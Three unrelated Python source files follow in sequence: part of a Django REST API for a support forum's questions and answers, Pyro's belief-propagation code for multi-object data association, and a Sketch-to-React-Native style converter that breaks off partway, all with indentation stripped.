'product',
'solution',
'solved_by',
'taken_until',
'taken_by',
'title',
'topic',
'updated_by',
'updated',
)
def get_involved(self, obj):
involved = set([obj.creator.profile])
involved.update(a.creator.profile for a in obj.answers.all())
return ProfileFKSerializer(involved, many=True).data
def get_solved_by(self, obj):
if obj.solution:
return ProfileFKSerializer(obj.solution.creator.profile).data
else:
return None
def get_creator(self, obj):
return ProfileFKSerializer(obj.creator.profile).data
def get_taken_by(self, obj):
if obj.taken_by:
return ProfileFKSerializer(obj.taken_by.profile).data
else:
return None
def get_updated_by(self, obj):
if obj.updated_by:
return ProfileFKSerializer(obj.updated_by.profile).data
else:
return None
def validate(self, data):
user = getattr(self.context.get('request'), 'user')
if user and not user.is_anonymous() and data.get('creator') is None:
data['creator'] = user
return data
class QuestionFKSerializer(QuestionSerializer):
class Meta:
model = Question
fields = (
'creator',
'id',
'title',
)
class QuestionFilter(django_filters.FilterSet):
product = django_filters.CharFilter(name='product__slug')
creator = django_filters.CharFilter(name='creator__username')
involved = django_filters.MethodFilter(action='filter_involved')
is_solved = django_filters.MethodFilter(action='filter_is_solved')
is_taken = django_filters.MethodFilter(action='filter_is_taken')
metadata = django_filters.MethodFilter(action='filter_metadata')
solved_by = django_filters.MethodFilter(action='filter_solved_by')
taken_by = django_filters.CharFilter(name='taken_by__username')
class Meta(object):
model = Question
fields = [
'creator',
'created',
'involved',
'is_archived',
'is_locked',
'is_solved',
'is_spam',
'is_taken',
'locale',
'num_answers',
'product',
'solved_by',
'taken_by',
'title',
'topic',
'updated',
'updated_by',
]
def filter_involved(self, queryset, username):
# This will remain unevaluated, and become a subquery of the final query.
# Using a subquery instead of a JOIN like Django would normally do
# should be faster in this case.
questions_user_answered = (
Answer.objects.filter(creator__username=username).values('question_id'))
answered_filter = Q(id__in=questions_user_answered)
creator_filter = Q(creator__username=username)
return queryset.filter(creator_filter | answered_filter)
def filter_is_taken(self, queryset, value):
field = serializers.BooleanField()
value = field.to_internal_value(value)
# is_taken doesn't exist. Instead, we decide if a question is taken
# based on ``taken_by`` and ``taken_until``.
now = datetime.now()
if value:
# only taken questions
return queryset.filter(~Q(taken_by=None), taken_until__gt=now)
else:
# only not taken questions
return queryset.filter(Q(taken_by=None) | Q(taken_until__lt=now))
def filter_is_solved(self, queryset, value):
field = serializers.BooleanField()
value = field.to_internal_value(value)
solved_filter = Q(solution=None)
if value:
solved_filter = ~solved_filter
return queryset.filter(solved_filter)
def filter_solved_by(self, queryset, username):
question_user_solved = (
Question.objects.filter(solution__creator__username=username).values('id'))
return queryset.filter(id__in=question_user_solved)
def filter_metadata(self, queryset, value):
try:
value = json.loads(value)
except ValueError:
raise GenericAPIException(400, 'metadata must be valid JSON.')
for name, values in value.items():
if not isinstance(values, list):
values = [values]
query = Q()
for v in values:
if v is None:
query = query | ~Q(metadata_set__name=name)
else:
query = query | Q(metadata_set__name=name, metadata_set__value=v)
queryset = queryset.filter(query)
return queryset
class QuestionViewSet(viewsets.ModelViewSet):
serializer_class = QuestionSerializer
queryset = Question.objects.all()
pagination_class = pagination.PageNumberPagination
permission_classes = [
OnlyCreatorEdits,
permissions.IsAuthenticatedOrReadOnly,
]
filter_class = QuestionFilter
filter_backends = [
filters.DjangoFilterBackend,
filters.OrderingFilter,
]
ordering_fields = [
'id',
'created',
'last_answer',
'num_answers',
'num_votes_past_week',
'updated',
]
# Default, if not overwritten
ordering = ('-id',)
@detail_route(methods=['POST'])
def solve(self, request, pk=None):
"""Accept an answer as the solution to the question."""
question = self.get_object()
answer_id = request.data.get('answer')
try:
answer = Answer.objects.get(pk=answer_id)
except Answer.DoesNotExist:
return Response({'answer': 'This field is required.'},
status=status.HTTP_400_BAD_REQUEST)
question.set_solution(answer, request.user)
return Response(status=status.HTTP_204_NO_CONTENT)
@detail_route(methods=['POST'], permission_classes=[permissions.IsAuthenticated])
def helpful(self, request, pk=None):
question = self.get_object()
if not question.editable:
raise GenericAPIException(403, 'Question not editable')
if question.has_voted(request):
raise GenericAPIException(409, 'Cannot vote twice')
QuestionVote(question=question, creator=request.user).save()
num_votes = QuestionVote.objects.filter(question=question).count()
return Response({'num_votes': num_votes})
@detail_route(methods=['POST'], permission_classes=[permissions.IsAuthenticated])
def follow(self, request, pk=None):
question = self.get_object()
actstream.actions.follow(request.user, question, actor_only=False, send_action=False)
return Response('', status=204)
@detail_route(methods=['POST'], permission_classes=[permissions.IsAuthenticated])
def unfollow(self, request, pk=None):
question = self.get_object()
actstream.actions.unfollow(request.user, question, send_action=False)
return Response('', status=204)
@detail_route(methods=['POST'])
def set_metadata(self, request, pk=None):
data = {}
data.update(request.data)
data['question'] = self.get_object().pk
serializer = QuestionMetaDataSerializer(data=data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
else:
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@detail_route(methods=['POST', 'DELETE'])
def delete_metadata(self, request, pk=None):
question = self.get_object()
if 'name' not in request.data:
return Response({'name': 'This field is required.'},
status=status.HTTP_400_BAD_REQUEST)
try:
meta = (QuestionMetaData.objects
.get(question=question, name=request.data['name']))
meta.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
except QuestionMetaData.DoesNotExist:
raise GenericAPIException(404, 'No matching metadata object found.')
@detail_route(methods=['POST'], permission_classes=[permissions.IsAuthenticatedOrReadOnly])
def take(self, request, pk=None):
question = self.get_object()
field = serializers.BooleanField()
force = field.to_internal_value(request.data.get('force', False))
try:
question.take(request.user, force=force)
except InvalidUserException:
raise GenericAPIException(400, 'Question creator cannot take a question.')
except AlreadyTakenException:
raise GenericAPIException(409, 'Conflict: question is already taken.')
return Response(status=204)
@detail_route(methods=['POST'], permission_classes=[permissions.IsAuthenticated])
def add_tags(self, request, pk=None):
question = self.get_object()
if 'tags' not in request.data:
return Response({'tags': 'This field is required.'},
status=status.HTTP_400_BAD_REQUEST)
tags = request.data['tags']
for tag in tags:
try:
add_existing_tag(tag, question.tags)
except Tag.DoesNotExist:
if request.user.has_perm('taggit.add_tag'):
question.tags.add(tag)
else:
raise GenericAPIException(403, 'You are not authorized to create new tags.')
tags = question.tags.all()
return Response(QuestionTagSerializer(tags, many=True).data)
@detail_route(methods=['POST', 'DELETE'], permission_classes=[permissions.IsAuthenticated])
def remove_tags(self, request, pk=None):
question = self.get_object()
if 'tags' not in request.data:
return Response({'tags': 'This field is required.'},
status=status.HTTP_400_BAD_REQUEST)
tags = request.data['tags']
for tag in tags:
question.tags.remove(tag)
return Response(status=status.HTTP_204_NO_CONTENT)
@detail_route(methods=['POST'], permission_classes=[permissions.IsAuthenticated])
def auto_tag(self, request, pk=None):
question = self.get_object()
question.auto_tag()
return Response(status=status.HTTP_204_NO_CONTENT)
@detail_route(methods=['POST'])
def attach_images(self, request, pk=None):
question = self.get_object()
user_ct = ContentType.objects.get_for_model(request.user)
qst_ct = ContentType.objects.get_for_model(question)
# Move over to the question all of the images I added to the reply form
up_images = ImageAttachment.objects.filter(creator=request.user, content_type=user_ct)
up_images.update(content_type=qst_ct, object_id=question.id)
return Response(status=status.HTTP_204_NO_CONTENT)
class AnswerSerializer(serializers.ModelSerializer):
content = SplitSourceField(read_source='content_parsed', write_source='content')
created = DateTimeUTCField(read_only=True)
creator = serializers.SerializerMethodField()
num_helpful_votes = serializers.ReadOnlyField()
num_unhelpful_votes = serializers.ReadOnlyField()
updated = DateTimeUTCField(read_only=True)
updated_by = serializers.SerializerMethodField()
class Meta:
model = Answer
fields = (
'id',
'question',
'content',
'created',
'creator',
'updated',
'updated_by',
'is_spam',
'num_helpful_votes',
'num_unhelpful_votes',
)
def get_creator(self, obj):
return ProfileFKSerializer(Profile.objects.get(user=obj.creator)).data
def get_updated_by(self, obj):
updated_by = Profile.objects.get(user=obj.updated_by) if obj.updated_by else None
return ProfileFKSerializer(updated_by).data if updated_by else None
def validate(self, data):
user = getattr(self.context.get('request'), 'user')
if user and not user.is_anonymous() and data.get('creator') is None:
data['creator'] = user
return data
class AnswerFKSerializer(AnswerSerializer):
class Meta:
model = Answer
fields = (
'id',
'question',
'creator',
)
class AnswerFilter(django_filters.FilterSet):
creator = django_filters.CharFilter(name='creator__username')
question = django_filters.Filter(name='question__id')
class Meta(object):
model = Answer
fields = [
'question',
'creator',
'created',
'updated',
'updated_by',
'is_spam',
]
class AnswerViewSet(viewsets.ModelViewSet):
serializer_class = AnswerSerializer
queryset = Answer.objects.all()
permission_classes = [
OnlyCreatorEdits,
permissions.IsAuthenticatedOrReadOnly,
]
filter_class = AnswerFilter
filter_backends = [
filters.DjangoFilterBackend,
filters.OrderingFilter,
]
filter_fields = [
'question',
'created',
'creator',
'updated',
'updated_by',
]
ordering_fields = [
'id',
'created',
'updated',
]
# Default, if not overwritten
ordering = ('-id',)
def get_pagination_serializer(self, page):
"""
Return a serializer instance to use with paginated data.
"""
class SerializerClass(self.pagination_serializer_class):
class Meta:
object_serializer_class = AnswerSerializer
context = self.get_serializer_context()
return SerializerClass(instance=page, context=context)
@detail_route(methods=['POST'], permission_classes=[permissions.IsAuthenticated])
def helpful(self, request, pk=None):
answer = self.get_object()
if not answer.question.editable:
raise GenericAPIException(403, 'Answer not editable')
if answer.has_voted(request):
raise GenericAPIException(409, 'Cannot vote twice')
AnswerVote(answer=answer, creator=request.user, helpful=True).save()
num_helpful_votes = AnswerVote.objects.filter(answer=answer, helpful=True).count()
num_unhelpful_votes = AnswerVote.objects.filter(answer=answer, helpful=False).count()
return Response({
'num_helpful_votes': num_helpful_votes,
'num_unhelpful_votes': num_unhelpful_votes,
})
@detail_route(methods=['POST'], permission_classes=[permissions.IsAuthenticated])
def follow(self, request, pk=None):
answer = self.get_object()
actstream.actions.follow(request.user, answer, actor_only=False)
return Response('', status=204)
@detail_route(methods=['POST'], permission_classes=[permissions.IsAuthenticated])
def unfollow(self, request, pk=None):
answer = self.get_object()
actstream.actions.unfollow(request.user, answer)
return Response('', status=204)
|
|
# Copyright (c) 2017-2019 Uber Technologies, Inc.
# SPDX-License-Identifier: Apache-2.0
import itertools
import math
import numbers
import torch
import pyro.distributions as dist
from pyro.util import warn_if_nan
def _product(factors):
result = 1.0
for factor in factors:
result = result * factor
return result
def _exp(value):
if isinstance(value, numbers.Number):
return math.exp(value)
return value.exp()
class MarginalAssignment:
"""
Computes marginal data associations between objects and detections.
This assumes that each detection corresponds to zero or one object,
and each object corresponds to zero or more detections. Specifically
this does not assume detections have been partitioned into frames of
mutual exclusion as is common in 2-D assignment problems.
:param torch.Tensor exists_logits: a tensor of shape ``[num_objects]``
representing per-object factors for existence of each potential object.
:param torch.Tensor assign_logits: a tensor of shape
``[num_detections, num_objects]`` representing per-edge factors of
assignment probability, where each edge denotes that a given detection
associates with a single object.
:param int bp_iters: optional number of belief propagation iterations. If
unspecified or ``None`` an expensive exact algorithm will be used.
:ivar int num_detections: the number of detections
:ivar int num_objects: the number of (potentially existing) objects
:ivar pyro.distributions.Bernoulli exists_dist: a mean field posterior
distribution over object existence.
:ivar pyro.distributions.Categorical assign_dist: a mean field posterior
distribution over the object (or None) to which each detection
associates. This has ``.event_shape == (num_objects + 1,)`` where the
final element denotes spurious detection, and
``.batch_shape == (num_frames, num_detections)``.
"""
def __init__(self, exists_logits, assign_logits, bp_iters=None):
assert exists_logits.dim() == 1, exists_logits.shape
assert assign_logits.dim() == 2, assign_logits.shape
assert assign_logits.shape[-1] == exists_logits.shape[-1]
self.num_detections, self.num_objects = assign_logits.shape
# Clamp to avoid NANs.
exists_logits = exists_logits.clamp(min=-40, max=40)
assign_logits = assign_logits.clamp(min=-40, max=40)
# This does all the work.
if bp_iters is None:
exists, assign = compute_marginals(exists_logits, assign_logits)
else:
exists, assign = compute_marginals_bp(
exists_logits, assign_logits, bp_iters
)
# Wrap the results in Distribution objects.
# This adds a final logit=0 element denoting spurious detection.
padded_assign = torch.nn.functional.pad(assign, (0, 1), "constant", 0.0)
self.assign_dist = dist.Categorical(logits=padded_assign)
self.exists_dist = dist.Bernoulli(logits=exists)
class MarginalAssignmentSparse:
"""
A cheap sparse version of :class:`MarginalAssignment`.
:param int num_detections: the number of detections
:param int num_objects: the number of (potentially existing) objects
:param torch.LongTensor edges: a ``[2, num_edges]``-shaped tensor of
(detection, object) index pairs specifying feasible associations.
:param torch.Tensor exists_logits: a tensor of shape ``[num_objects]``
representing per-object factors for existence of each potential object.
:param torch.Tensor assign_logits: a tensor of shape ``[num_edges]``
representing per-edge factors of assignment probability, where each
edge denotes that a given detection associates with a single object.
:param int bp_iters: optional number of belief propagation iterations. If
unspecified or ``None`` an expensive exact algorithm will be used.
:ivar int num_detections: the number of detections
:ivar int num_objects: the number of (potentially existing) objects
:ivar pyro.distributions.Bernoulli exists_dist: a mean field posterior
distribution over object existence.
:ivar pyro.distributions.Categorical assign_dist: a mean field posterior
distribution over the object (or None) to which each detection
associates. This has ``.event_shape == (num_objects + 1,)`` where the
final element denotes spurious detection, and
``.batch_shape == (num_frames, num_detections)``.
"""
def __init__(
self, num_objects, num_detections, edges, exists_logits, assign_logits, bp_iters
):
assert edges.dim() == 2, edges.shape
assert edges.shape[0] == 2, edges.shape
assert exists_logits.shape == (num_objects,), exists_logits.shape
assert assign_logits.shape == edges.shape[1:], assign_logits.shape
self.num_objects = num_objects
self.num_detections = num_detections
self.edges = edges
# Clamp to avoid NANs.
exists_logits = exists_logits.clamp(min=-40, max=40)
assign_logits = assign_logits.clamp(min=-40, max=40)
# This does all the work.
exists, assign = compute_marginals_sparse_bp(
num_objects, num_detections, edges, exists_logits, assign_logits, bp_iters
)
# Wrap the results in Distribution objects.
# This adds a final logit=0 element denoting spurious detection.
padded_assign = torch.full(
(num_detections, num_objects + 1),
-float("inf"),
dtype=assign.dtype,
device=assign.device,
)
padded_assign[:, -1] = 0
padded_assign[edges[0], edges[1]] = assign
self.assign_dist = dist.Categorical(logits=padded_assign)
self.exists_dist = dist.Bernoulli(logits=exists)
class MarginalAssignmentPersistent:
"""
This computes marginal distributions of a multi-frame multi-object
data association problem with an unknown number of persistent objects.
The inputs are factors in a factor graph (existence probabilites for each
potential object and assignment probabilities for each object-detection
pair), and the outputs are marginal distributions of posterior existence
probability of each potential object and posterior assignment probabilites
of each object-detection pair.
This assumes a shared (maximum) number of detections per frame; to handle
variable number of detections, simply set corresponding elements of
``assign_logits`` to ``-float('inf')``.
:param torch.Tensor exists_logits: a tensor of shape ``[num_objects]``
representing per-object factors for existence of each potential object.
:param torch.Tensor assign_logits: a tensor of shape
``[num_frames, num_detections, num_objects]`` representing per-edge
factors of assignment probability, where each edge denotes that at a
given time frame a given detection associates with a single object.
:param int bp_iters: optional number of belief propagation iterations. If
unspecified or ``None`` an expensive exact algorithm will be used.
:param float bp_momentum: optional momentum to use for belief propagation.
Should be in the interval ``[0,1)``.
:ivar int num_frames: the number of time frames
:ivar int num_detections: the (maximum) number of detections per frame
:ivar int num_objects: the number of (potentially existing) objects
:ivar pyro.distributions.Bernoulli exists_dist: a mean field posterior
distribution over object existence.
:ivar pyro.distributions.Categorical assign_dist: a mean field posterior
distribution over the object (or None) to which each detection
associates. This has ``.event_shape == (num_objects + 1,)`` where the
final element denotes spurious detection, and
``.batch_shape == (num_frames, num_detections)``.
"""
def __init__(self, exists_logits, assign_logits, bp_iters=None, bp_momentum=0.5):
assert exists_logits.dim() == 1, exists_logits.shape
assert assign_logits.dim() == 3, assign_logits.shape
assert assign_logits.shape[-1] == exists_logits.shape[-1]
self.num_frames, self.num_detections, self.num_objects = assign_logits.shape
# Clamp to avoid NANs.
exists_logits = exists_logits.clamp(min=-40, max=40)
assign_logits = assign_logits.clamp(min=-40, max=40)
# This does all the work.
if bp_iters is None:
exists, assign = compute_marginals_persistent(exists_logits, assign_logits)
else:
exists, assign = compute_marginals_persistent_bp(
exists_logits, assign_logits, bp_iters, bp_momentum
)
# Wrap the results in Distribution objects.
# This adds a final logit=0 element denoting spurious detection.
padded_assign = torch.nn.functional.pad(assign, (0, 1), "constant", 0.0)
self.assign_dist = dist.Categorical(logits=padded_assign)
self.exists_dist = dist.Bernoulli(logits=exists)
assert self.assign_dist.batch_shape == (self.num_frames, self.num_detections)
assert self.exists_dist.batch_shape == (self.num_objects,)
def compute_marginals(exists_logits, assign_logits):
"""
This implements exact inference of pairwise marginals via
enumeration. This is very expensive and is only useful for testing.
See :class:`MarginalAssignment` for args and problem description.
"""
num_detections, num_objects = assign_logits.shape
assert exists_logits.shape == (num_objects,)
dtype = exists_logits.dtype
device = exists_logits.device
exists_probs = torch.zeros(
2, num_objects, dtype=dtype, device=device
) # [not exist, exist]
assign_probs = torch.zeros(
num_detections, num_objects + 1, dtype=dtype, device=device
)
for assign in itertools.product(range(num_objects + 1), repeat=num_detections):
assign_part = sum(
assign_logits[j, i] for j, i in enumerate(assign) if i < num_objects
)
for exists in itertools.product(
*[[1] if i in assign else [0, 1] for i in range(num_objects)]
):
exists_part = sum(exists_logits[i] for i, e in enumerate(exists) if e)
prob = _exp(exists_part + assign_part)
for i, e in enumerate(exists):
exists_probs[e, i] += prob
for j, i in enumerate(assign):
assign_probs[j, i] += prob
# Convert from probs to logits.
exists = exists_probs.log()
assign = assign_probs.log()
exists = exists[1] - exists[0]
assign = assign[:, :-1] - assign[:, -1:]
warn_if_nan(exists, "exists")
warn_if_nan(assign, "assign")
return exists, assign
def compute_marginals_bp(exists_logits, assign_logits, bp_iters):
"""
This implements approximate inference of pairwise marginals via
loopy belief propagation, adapting the approach of [1].
See :class:`MarginalAssignment` for args and problem description.
[1] Jason L. Williams, Roslyn A. Lau (2014)
Approximate evaluation of marginal association probabilities with
belief propagation
https://arxiv.org/abs/1209.6299
"""
message_e_to_a = torch.zeros_like(assign_logits)
message_a_to_e = torch.zeros_like(assign_logits)
for i in range(bp_iters):
message_e_to_a = (
-(message_a_to_e - message_a_to_e.sum(0, True) - exists_logits)
.exp()
.log1p()
)
joint = (assign_logits + message_e_to_a).exp()
message_a_to_e = (
(assign_logits - torch.log1p(joint.sum(1, True) - joint)).exp().log1p()
)
warn_if_nan(message_e_to_a, "message_e_to_a iter {}".format(i))
warn_if_nan(message_a_to_e, "message_a_to_e iter {}".format(i))
# Convert from probs to logits.
exists = exists_logits + message_a_to_e.sum(0)
assign = assign_logits + message_e_to_a
warn_if_nan(exists, "exists")
warn_if_nan(assign, "assign")
return exists, assign
def compute_marginals_sparse_bp(
num_objects, num_detections, edges, exists_logits, assign_logits, bp_iters
):
"""
This implements approximate inference of pairwise marginals via
loopy belief propagation, adapting the approach of [1].
See :class:`MarginalAssignmentSparse` for args and problem description.
[1] Jason L. Williams, Roslyn A. Lau (2014)
Approximate evaluation of marginal association probabilities with
belief propagation
https://arxiv.org/abs/1209.6299
"""
exists_factor = exists_logits[edges[1]]
def sparse_sum(x, dim, keepdim=False):
assert dim in (0, 1)
x = torch.zeros(
[num_objects, num_detections][dim], dtype=x.dtype, device=x.device
).scatter_add_(0, edges[1 - dim], x)
if keepdim:
x = x[edges[1 - dim]]
return x
message_e_to_a = torch.zeros_like(assign_logits)
message_a_to_e = torch.zeros_like(assign_logits)
for i in range(bp_iters):
message_e_to_a = (
-(message_a_to_e - sparse_sum(message_a_to_e, 0, True) - exists_factor)
.exp()
.log1p()
)
joint = (assign_logits + message_e_to_a).exp()
message_a_to_e = (
(assign_logits - torch.log1p(sparse_sum(joint, 1, True) - joint))
.exp()
.log1p()
)
warn_if_nan(message_e_to_a, "message_e_to_a iter {}".format(i))
warn_if_nan(message_a_to_e, "message_a_to_e iter {}".format(i))
# Convert from probs to logits.
exists = exists_logits + sparse_sum(message_a_to_e, 0)
assign = assign_logits + message_e_to_a
warn_if_nan(exists, "exists")
warn_if_nan(assign, "assign")
return exists, assign
def compute_marginals_persistent(exists_logits, assign_logits):
"""
This implements exact inference of pairwise marginals via
enumeration. This is very expensive and is only useful for testing.
See :class:`MarginalAssignmentPersistent` for args and problem description.
"""
num_frames, num_detections, num_objects = assign_logits.shape
assert exists_logits.shape == (num_objects,)
dtype = exists_logits.dtype
device = exists_logits.device
total = 0
exists_probs = torch.zeros(num_objects, dtype=dtype, device=device)
assign_probs = torch.zeros(
num_frames, num_detections, num_objects, dtype=dtype, device=device
)
for exists in itertools.product([0, 1], repeat=num_objects):
exists = [i for i, e in enumerate(exists) if e]
exists_part = _exp(sum(exists_logits[i] for i in exists))
# The remaining variables are conditionally independent conditioned on exists.
assign_parts = []
assign_sums = []
for t in range(num_frames):
assign_map = {}
for n in range(1 + min(len(exists), num_detections)):
for objects in itertools.combinations(exists, n):
for detections in itertools.permutations(range(num_detections), n):
assign = tuple(zip(objects, detections))
assign_map[assign] = _exp(
sum(assign_logits[t, j, i] for i, j in assign)
)
assign_parts.append(assign_map)
assign_sums.append(sum(assign_map.values()))
prob = exists_part * _product(assign_sums)
total += prob
for i in exists:
exists_probs[i] += prob
for t in range(num_frames):
other_part = exists_part * _product(assign_sums[:t] + assign_sums[t + 1 :])
for assign, assign_part in assign_parts[t].items():
prob = other_part * assign_part
for i, j in assign:
assign_probs[t, j, i] += prob
# Convert from probs to logits.
exists = exists_probs.log() - (total - exists_probs).log()
assign = assign_probs.log() - (total - assign_probs.sum(-1, True)).log()
warn_if_nan(exists, "exists")
warn_if_nan(assign, "assign")
return exists, assign
def compute_marginals_persistent_bp(
exists_logits, assign_logits, bp_iters, bp_momentum=0.5
):
"""
This implements approximate inference of pairwise marginals via
loopy belief propagation, adapting the approach of [1], [2].
See :class:`MarginalAssignmentPersistent` for args and problem description.
[1] Jason L. Williams, Roslyn A. Lau (2014)
Approximate evaluation of marginal association probabilities with
belief propagation
https://arxiv.org/abs/1209.6299
[2] Ryan Turner, Steven Bottone, Bhargav Avasarala (2014)
A Complete Variational Tracker
https://papers.nips.cc/paper/5572-a-complete-variational-tracker.pdf
"""
# This implements forward-backward message passing among three sets of variables:
#
# a[t,j] ~ Categorical(num_objects + 1), detection -> object assignment
# b[t,i] ~ Categorical(num_detections + 1), object -> detection assignment
# e[i] ~ Bernonulli, whether each object exists
#
# Only assign = a and exists = e are returned.
assert 0 <= bp_momentum < 1, bp_momentum
old, new = bp_momentum, 1 - bp_momentum
num_frames, num_detections, num_objects = assign_logits.shape
dtype = assign_logits.dtype
device = assign_logits.device
message_b_to_a = torch.zeros(
num_frames, num_detections, num_objects, dtype=dtype, device=device
)
message_a_to_b = torch.zeros(
num_frames, num_detections, num_objects, dtype=dtype, device=device
)
message_b_to_e = torch.zeros(num_frames, num_objects, dtype=dtype, device=device)
message_e_to_b = torch.zeros(num_frames, num_objects, dtype=dtype, device=device)
for i in range(bp_iters):
odds_a = (assign_logits + message_b_to_a).exp()
message_a_to_b = old * message_a_to_b + new * (
assign_logits - (odds_a.sum(2, True) - odds_a).log1p()
)
message_b_to_e = (
old * message_b_to_e + new * message_a_to_b.exp().sum(1).log1p()
)
message_e_to_b = old * message_e_to_b + new * (
exists_logits + message_b_to_e.sum(0) - message_b_to_e
)
odds_b = message_a_to_b.exp()
message_b_to_a = (
old * message_b_to_a
- new
* (
(-message_e_to_b).exp().unsqueeze(1)
+ (1 + odds_b.sum(1, True) - odds_b)
).log()
)
warn_if_nan(message_a_to_b, "message_a_to_b iter {}".format(i))
warn_if_nan(message_b_to_e, "message_b_to_e iter {}".format(i))
warn_if_nan(message_e_to_b, "message_e_to_b iter {}".format(i))
warn_if_nan(message_b_to_a, "message_b_to_a iter {}".format(i))
# Convert from probs to logits.
exists = exists_logits + message_b_to_e.sum(0)
assign = assign_logits + message_b_to_a
warn_if_nan(exists, "exists")
warn_if_nan(assign, "assign")
return exists, assign
|
|
from sketch_components.engines.base.converters import BaseSketchStyle, \
SketchColor
from sketch_components.engines.react.base import converters
from sketch_components.utils import update_existing, combine_styles, \
remove_existing, hyphen_to_small_camel, \
transform_dict_keys
from .components.button import Button
from .components.component import Component
from .components.custom_progress_bar import CustomProgressBar
from .components.custom_tab_bar_header import CustomTabBarHeader
from .components.empty import Empty
from .components.image import Image
from .components.listview import ListView
from .components.listviewitem import ListViewItem
from .components.margin_layer import MarginLayer
from .components.modal import Modal
from .components.padding_layer import PaddingLayer
from .components.picker import Picker
from .components.progress_bar_android import ProgressBarAndroid
from .components.scrollview import ScrollView
from .components.slider import Slider
from .components.statusbar import StatusBar
from .components.styledcomponent import StyledComponent
from .components.svgcomponent import SvgComponent
from .components.switch import Switch
from .components.text import Text
from .components.textinput import TextInput
from .components.toolbar import ToolbarAndroid
from .components.touchable import Touchable
from .components.view import View
PLUGIN_ID = "co.ibhubs.SketchComponents"
class ComponentProperties(converters.ComponentProperties):
content_prop = 'content'
def get_react_native_props(self):
return self.get_react_props(self.react_native)
def get_react_native_component_content(self):
return self.get_react_component_content(self.react_native)
def get_react_native_component(self):
return self.get_react_component(self.react_native)
def get_react_native_flex_styles(self):
return self.get_react_flex_styles(self.react_native)
def get_react_native_resizing_constraints(self):
return self.get_react_resizing_constraints(self.react_native)
def get_react_native_absolute_positioning_constraints(self):
return self.get_react_absolute_positioning_constraints(
self.react_native)
class SketchFrame(converters.SketchFrame):
pass
class SketchFont(converters.SketchFont):
def get_css_styles(self):
mapping = super(self.__class__, self).get_css_empty_styles()
for key in mapping.keys():
mapping[key] = hyphen_to_small_camel(key)
return transform_dict_keys(
super(self.__class__, self).get_css_styles(), mapping)
def get_css_empty_styles(self):
return map(hyphen_to_small_camel,
super(self.__class__, self).get_css_empty_styles().keys())
class SketchParagraphStyle(converters.SketchParagraphStyle):
pass
class SketchTextStyle(converters.SketchTextStyle):
font_class = SketchFont
paragraph_class = SketchParagraphStyle
class SketchGraphicsContextSettings(converters.SketchGraphicsContextSettings):
pass
class SketchGradientStop(converters.SketchGradientStop):
pass
class SketchGradient(converters.SketchGradient):
pass
class SketchFill(converters.SketchFill):
graphics_context_class = SketchGraphicsContextSettings
gradient_class = SketchGradient
class SketchBorder(converters.SketchBorder):
gradient_class = SketchGradient
graphics_context_class = SketchGraphicsContextSettings
class SketchBorderOptions(converters.SketchBorderOptions):
pass
# TODO: Implement method to get inner shadow styles.
class SketchShadow(converters.SketchShadow):
graphic_context_class = SketchGraphicsContextSettings
def get_css_shadow_styles(self):
styles = {
# Android-only style
'elevation': None,
# iOS-only styles
'shadowColor': None,
'shadowOffset': dict(),
'shadowOpacity': None,
'shadowRadius': None,
}
if self.isEnabled == 0:
return styles
if self.offsetX is not None:
styles['shadowOffset']['width'] = self.offsetX
if self.offsetY is not None:
styles['shadowOffset']['height'] = self.offsetY
if self.color is not None:
styles['shadowColor'] = self.color.rgba()
if self.blurRadius is not None:
styles['shadowRadius'] = self.blurRadius
if (self.contextSettings is not None and
self.contextSettings.opacity is not None):
styles['shadowOpacity'] = self.contextSettings.opacity
if self.offsetY is not None and self.blurRadius is not None:
# This is just an approximation. There is no straight-forward way
# as elevation leads to limited set of possible shadows.
styles['elevation'] = int((self.offsetY + self.blurRadius) / 2)
return styles
def get_css_text_shadow_styles(self):
styles = {
'textShadowColor': None,
'textShadowOffset': dict(),
'textShadowRadius': None,
}
if self.offsetX is not None:
styles['textShadowOffset']['width'] = self.offsetX
if self.offsetY is not None:
styles['textShadowOffset']['height'] = self.offsetY
if self.color is not None:
styles['textShadowColor'] = self.color.rgba()
if self.blurRadius is not None:
styles['textShadowRadius'] = self.blurRadius
return styles
class SketchStyleBlur(converters.SketchStyleBlur):
pass
class SketchStyleReflection(converters.SketchStyleReflection):
pass
class SketchStyleColorControls(converters.SketchStyleColorControls):
pass
class SketchStyle(BaseSketchStyle):
fill_class = SketchFill
shadow_class = SketchShadow
text_style_class = SketchTextStyle
border_class = SketchBorder
border_options_class = SketchBorderOptions
graphic_context_class = SketchGraphicsContextSettings
blur_class = SketchStyleBlur
reflection_class = SketchStyleReflection
color_controls_class = SketchStyleColorControls
def get_css_styles(self):
styles = {
}
return styles
def get_css_view_styles(self):
view_styles = {
'backfaceVisibility': None,
'backgroundColor': None,
'borderBottomColor': None,
'borderBottomLeftRadius': None,
'borderBottomRightRadius': None,
'borderBottomWidth': None,
'borderColor': None,
'borderLeftColor': None,
'borderLeftWidth': None,
'borderRadius': None,
'borderRightColor': None,
'borderRightWidth': None,
'borderStyle': None,
'borderTopColor': None,
'borderTopLeftRadius': None,
'borderTopRightRadius': None,
'borderTopWidth': None,
'borderWidth': None,
'opacity': None,
'overflow': None,
'elevation': None,
}
for fill in self.fills:
if fill.isEnabled:
update_existing(view_styles, fill.get_css_styles())
return view_styles
def get_css_image_styles(self):
image_styles = {
'backfaceVisibility': None,
'backgroundColor': None,
'borderBottomLeftRadius': None,
'borderBottomRightRadius': None,
'borderColor': None,
'borderRadius': None,
'borderTopLeftRadius': None,
'borderTopRightRadius': None,
'borderWidth': None,
'opacity': None,
'overflow': None,
'resizeMode': None,
'tintColor': None,
'overlayColor': None,
}
return image_styles
def get_css_text_styles(self):
text_styles = {
'color': None,
'fontFamily': None,
'fontSize': None,
'fontStyle': None,
'fontWeight': None,
'lineHeight': None,
'textAlign': None,
'textDecorationLine': None,
'textShadowColor': None,
'textShadowOffset': None,
'textShadowRadius': None,
'includeFontPadding': None,
'textAlignVertical': None,
'fontVariant': None,
'letterSpacing': None,
'textDecorationColor': None,
'textDecorationStyle': None,
'writingDirection': None,
}
if self.textStyle:
update_existing(text_styles, self.textStyle.get_css_styles())
if self.has_fills():
for fill in self.fills:
if fill.isEnabled:
update_existing(text_styles,
{'color': fill.get_css_fill_color()})
if self.contextSettings:
opacity = self.contextSettings.opacity
if (opacity not in [0, 1, None, 0.0, 1.0] and
text_styles.get('color')):
color = SketchColor({'color': text_styles.get('color')})
color.a = round(opacity, 2)
text_styles['color'] = color.rgba()
return text_styles
def get_border_styles(self):
border_styles = {
'borderRadius': None,
'borderWidth': None,
'borderColor': None,
'borderStyle': None
}
